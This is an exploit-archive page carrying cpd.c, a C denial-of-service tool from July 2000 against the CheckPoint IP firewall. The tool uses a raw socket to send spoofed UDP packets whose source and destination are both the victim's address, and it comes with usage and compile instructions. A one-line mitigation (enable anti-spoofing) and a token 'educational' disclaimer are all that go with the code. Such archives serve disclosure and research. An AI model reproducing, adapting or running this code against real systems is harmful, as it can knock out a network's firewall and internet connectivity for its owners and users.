cpd.c

cpd.c: Posted Jul 1, 2000; Authored by Antipent; CheckPoint IP firewall crashes when it detects packets coming from a different MAC with the same IP address as itself. We simply send a few spoofed UDP packets to it.; tags | exploit, udp, spoof; SHA-256 | ad01316cc5a45abb3776b8ade259c2dc2b3b162171ce1778e569bed038e2056d; Download | Favorite | View

cpd.c

/*
 *  CheckPoint IP Firewall Denial of Service Attack
 *  July 2000 
 *
 *  Bug found by: antipent <rtodd@antipentium.com>
 *  Code by: lore <fiddler@antisocial.com>
 *
 *  [Intro]
 *
 *  CheckPoint IP firewall crashes when it detects packets coming from
 *  a different MAC with the same IP address as itself. We simply
 *  send a few spoofed UDP packets to it, 100 or so should usually do
 *  it.
 *
 *  [Impact]
 *
 *  Crashes the firewall and usually the box its running on. Resulting
 *  in a complete stand still on the networks internet connectivity.
 *
 *  [Solution]
 *
 *  Turn on anti-spoofing, the firewall has an inbuilt function to do
 *  this.
 *
 *  [Disclaimer]
 *
 *  Don't use this code. It's for educational purposes.
 *
 *  [Example]
 *
 *  ./cpd 1.2.3.4 500 53
 *
 *  [Compile]
 *
 *  cc -o cpd cpd.c
 *
 *  [Support]
 *
 *  This is designed to compile on Linux. I would port it, but you're
 *  not meant to be running it anyway, right?
 *
 *  -- lore
 */

#define __BSD_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netinet/ip.h>
#include <netinet/ip_udp.h>

#define TRUE   1
#define FALSE  0
#define ERR   -1

typedef u_long         ip_t;
typedef long           sock_t;
typedef struct ip      iph_t;
typedef struct udphdr  udph_t;
typedef u_short        port_t;

#define IP_SIZE  (sizeof(iph_t))
#define UDP_SIZE (sizeof(udph_t))
#define PSIZE    (IP_SIZE + UDP_SIZE)
#define IP_OFF   (0)
#define UDP_OFF  (IP_OFF + IP_SIZE)

void     usage               __P ((u_char *));
u_short  checksum            __P ((u_short *, int));

int main (int argc, char * * argv)
{
  ip_t victim;
  sock_t fd;
  iph_t * ip_ptr;
  udph_t * udp_ptr;
  u_char packet[PSIZE];
  u_char * yes = "1";
  struct sockaddr_in sa;
  port_t aport;  
  u_long packets; 

  if (argc < 3) 
  {
    usage (argv[0]);
  }
  
  fprintf(stderr, "\n*** CheckPoint IP Firewall DoS\n");
  fprintf(stderr, "*** Bug discovered by: antipent <rtodd@antipentium.com>\n");
  fprintf(stderr, "*** Code by: lore <fiddler@antisocial.com>\n\n");

  if ((victim = inet_addr(argv[1])) == ERR)
  {
    fprintf(stderr, "Bad IP address '%s'\n", argv[1]);
    exit(EXIT_FAILURE);
  }

  else if (!(packets = atoi(argv[2])))
  {
    fprintf(stderr, "You should send at least 1 packet\n");
    exit(EXIT_FAILURE);
  }

  else if ((fd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == ERR)
  {
    fprintf(stderr, "Couldn't create raw socket: %s\n", strerror(errno));
    exit(EXIT_FAILURE);
  }
 
  else if ((setsockopt(fd, IPPROTO_IP, IP_HDRINCL, &yes, 1)) == ERR)
  {
    fprintf(stderr, "Couldn't set socket options: %s\n", strerror(errno));
    exit(EXIT_FAILURE);
  }

  srand((unsigned)time(NULL));

  if (argc > 3)
  { 
    aport = htons(atoi(argv[3]));
  }
  else
  {
    aport = htons(rand() % 65535 + 1);
  }

  fprintf(stderr, "Sending packets: ");

  while (packets--)
  {

    memset(packet, 0, PSIZE);

    ip_ptr = (iph_t *)(packet + IP_OFF);
    udp_ptr = (udph_t *)(packet + UDP_OFF);

    ip_ptr->ip_hl = 5;
    ip_ptr->ip_v = 4;
    ip_ptr->ip_tos = 0;
    ip_ptr->ip_len = PSIZE;
    ip_ptr->ip_id = 1234;
    ip_ptr->ip_off = 0;
    ip_ptr->ip_ttl = 255;
    ip_ptr->ip_p = IPPROTO_UDP;
    ip_ptr->ip_sum = 0;
    ip_ptr->ip_src.s_addr = victim;
    ip_ptr->ip_dst.s_addr = victim; 

    udp_ptr->source = htons(rand() % 65535 + 1);
    udp_ptr->dest = aport;
    udp_ptr->len = htons(UDP_SIZE);
    udp_ptr->check = checksum((u_short *)ip_ptr, PSIZE);

    sa.sin_port = htons(aport);
    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = victim;

    if ((sendto(fd, 
                packet,
                PSIZE,
                0,
                (struct sockaddr *)&sa,
                sizeof(struct sockaddr_in))) == ERR)
    {
      fprintf(stderr, "Couldn't send packet: %s\n",
        strerror(errno));
      close(fd);
      exit(EXIT_FAILURE);
    }
    fprintf(stderr, ".");

  }

  fprintf(stderr, "\n");
  close(fd);

  return (EXIT_SUCCESS);
}

void usage (u_char * pname)
{
  fprintf(stderr, "Usage: %s <victim_ip> <packets> [port]\n", pname);
  exit(EXIT_SUCCESS);
}

u_short checksum (u_short *addr, int len)
{
   register int nleft = len;
   register int sum = 0;
   u_short answer = 0;

   while (nleft > 1) {
      sum += *addr++;
      nleft -= 2;
   }

   if (nleft == 1) {
      *(u_char *)(&answer) = *(u_char *)addr;
      sum += answer;
   }

   sum = (sum >> 16) + (sum + 0xffff);
   sum += (sum >> 16);
   answer = ~sum;
   return(answer);
}

/* EOF */

Top Authors In Last 30 Days

Red Hat 233 files
Ubuntu 87 files
Gentoo 31 files
Debian 20 files
tmrswrr 9 files
Sina Kheirkhah 7 files
bRpsd 4 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files
Jerry Thomas 2 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,081)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,414)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,315)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,668)
UNIX (9,427)
UnixWare (187)
Windows (6,666)
Other

cpd.c

cpd.c

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

cpd.c

Share This

cpd.c

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems